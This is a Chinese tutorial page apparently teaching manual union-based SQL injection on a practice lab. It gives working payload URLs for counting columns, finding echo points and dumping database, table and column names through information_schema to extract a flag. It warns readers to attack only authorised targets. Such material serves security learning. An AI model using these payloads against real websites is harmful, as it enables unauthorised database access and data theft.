SQL注入(一) |
您所在的位置:网站首页 › sql注入测试用例怎么写 › SQL注入(一) |
SQL
SQL注入sql 注入的核心
SQL 手注的一般流程判断注入点 —— 第一步判断字段数 —— 第二步判断回显点 —— 第三步查询相关内容 —— 第四步判断库名判断表名判断列名查询具体信息
总结
SQL注入
SQL注入攻击是目前web应用网络攻击中最常见的手段之一,曾被冠以 “漏洞之王” 的称号,其安全风险高于缓冲区溢出漏洞等所有其他漏洞,而市场上的防火墙又不能对SQL注入漏洞进行有效的检测和防范。SQL注入攻击普遍存在范围广、实现容易、破坏性大等特点。
先来走一遍国际惯例——定义入手:什么是SQL和SQL注入? 结构化查询语言(Structured Query Language)简称 SQL,是一种特殊目的的编程语言,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统。 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾后,添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 简单来讲就是:攻击者通过构造不同的SQL语句来实现对数据库的操作。 此处两个关键条件: 参数用户可控 —— 即用户能够控制数据的输入我们构造的参数可带入数据库执行 —— 原本要执行的代码,拼接了用户的输入总结一下: sql 注入的核心将用户输入的数据拼接到代码中,并被当成 sql 语句执行。 SQL 手注的一般流程以下操作以某靶场为例,大家可以跟着试一试 (((搬出中华人民共和国网络安全法,这里提醒大家法无授权不可为,渗透测试在靶场做做就好,千万不要去乱搞其他网站,(除非你得到了网站管理员的渗透测试许可),入狱了不要把我供出来 初始界面: 找页面与数据库产生交互的地方。 我们找到界面中的 url : http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1这一长串url中 ’ ? ’ 后跟的就是参数id=1,’ ? ’ 表示传参。一般来讲 ’ ? '的内容都是用户可控的。若不存在能够与数据库产生交互的地方,那么sql注入也就自然无处下手了。 这里id=后面的内容就可以进行参数修改啦。 传入SQL语句可控参数分为两类 数字类型,参数不用被引号引用 ?id=1其他类型,参数需要被引号引用 ?name="phone"我们尝试一下修改参数 http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=2可以看到界面的查询结果改变了
使用order by子句,利用网页报错判断字段数,为下一步铺垫 order by 函数具体用法放在这啦,就不详细展开讲了。 ORDER BY 语句用于根据指定的列对结果集进行排序。 我们从order by 1 开始尝试 http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 order by 1 http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 order by 2 http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 order by 3以上操作界面均显示正常 但是当改为 order by 4 时,界面报错 由此我们可以得出:说明此处存在三个字段 判断回显点 —— 第三步接下来我们要使用union select语句,联合查询,通过页面回显找到回显点,再利用其获取我们需要查询的数据。 前置知识: select 语句用于从表中选取数据。 union 操作符用于合并两个或多个 SELECT 语句的结果集。 注意: UNION 结果集中的列名总是等于 UNION 中第一个 SELECT 语句中的列名。 什么意思呢? 就是联合查询前后的两个表,第一个表的字段数与第二个表的字段数必须相等,否则就会报错。像这样: 那如果一个表的字段数与第二个表的字段数不相等怎么办呢?我们可以进行如下操作手动补全: http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 union select 1,2,3这样就显示正常了
保险起见我们验证一下: http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,222,333
接下来我们利用显错位获取相关内容,这里我们再分几步进行 mysql中的information_schema说明 information_schema : mysql数据库5.0以上版本,自带数据库,记录了mysql下所有的库名,表名,列名等信息。 主要用到以下几个: schemata表 (mysql服务器中所有数据库信息的表)tables表 (mysql服务器中所有表信息的表)columns表(mysql服务器所有列信息的表)table_schema 数据库名table_name 表名column_name 列名 判断库名MySQL中的 database()函数 返回默认或当前数据库的名称。 在刚刚的回显点加入database函数,以此得到库名 http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,database(),database()
为了查询表名,我们将union后的语句改成: union select 1,table_name,3 from information_schema.tables where table_schema='error'下面对这段语句进行详细解释: 回顾一下 select语句 用于从表中选取数据: SELECT_(列名1,2,3,…)_ FROM _(表名) 已知回显点在列名2和列名3,我们将需要查询返回的数据放在回显点处。 table_name列在information_schema库的tables表下。 注意这里不能直接写表名tables, 否则它会在error库下找tables表,找不到就会报错。 因此需要使用【库名.表名】的格式:information_schema.tables where子句 用于规定选择的标准。 WHERE_(限定条件) 我们需要查询的是error库的表名,因此在查询中限定table_schema='error'. 也就是返回本张表中所有table_schema这一字段的值为error的数据所对应的table_name值。 好了,现在我们实践一下: http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema='error'为了显示union select后的内容,我们同样在前面加上and 1=2 同理,列column_name在表information_schema.column下 union后修改为 union select 1,column_name,3 from information_schema.columns where table_schema='error' and table_name='error_flag'
LIMIT_(参数1),(参数2) 第一个参数指定第一个返回记录行的偏移量(注意这里从0计数),第二个参数指定返回记录行的最大数目。 即 第(参数1)+1个数据 到 第(参数1+参数2)+1个数据 实践一下,查询第二个列名 limit 1,1 union select 1,column_name,3 from information_schema.columns where table_schema='error' and table_name='error_flag' limit 1,1
靶场小任务
SQL手注四部曲: 判断注入点id=1 and 1=2 判断字段数id=1 order by 1 判断回显点id=1 and 1=2 union select 1,2,3 查询相关内容id=1 and 1=2 union select 1,database(),3 id=1 and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema='error’ id=1 ans 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘error’ and table_name='error_flag’ union select 1,flag,3 from error_flag End 完结撒花~ 不许走 点个赞 |
今日新闻 |
点击排行 |
|
推荐新闻 |
图片新闻 |
|
专题文章 |
CopyRight 2018-2019 实验室设备网 版权所有 win10的实时保护怎么永久关闭 |